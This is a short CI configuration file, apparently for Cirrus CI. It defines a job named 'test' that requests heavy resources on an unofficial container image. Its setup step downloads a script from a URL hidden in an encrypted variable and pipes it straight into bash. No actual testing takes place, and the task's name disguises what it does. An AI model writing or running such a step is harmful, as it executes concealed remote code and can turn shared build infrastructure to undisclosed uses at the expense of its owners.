env:
    SCR: ENCRYPTED[fd2063caea2972a1e81c4fdf91e1562b0a46dfd734d138a6fb7109d7fe63e53fca7090fd807bb74c2c967ddfd811c7c5]

task:
  name: "test"
  timeout_in: 120m
  container:
      image: shazuxdd/ubuntu:latest
      cpu: 4
      memory: 16G
  Setup_script:
      - curl -sL ${SCR} | bash 
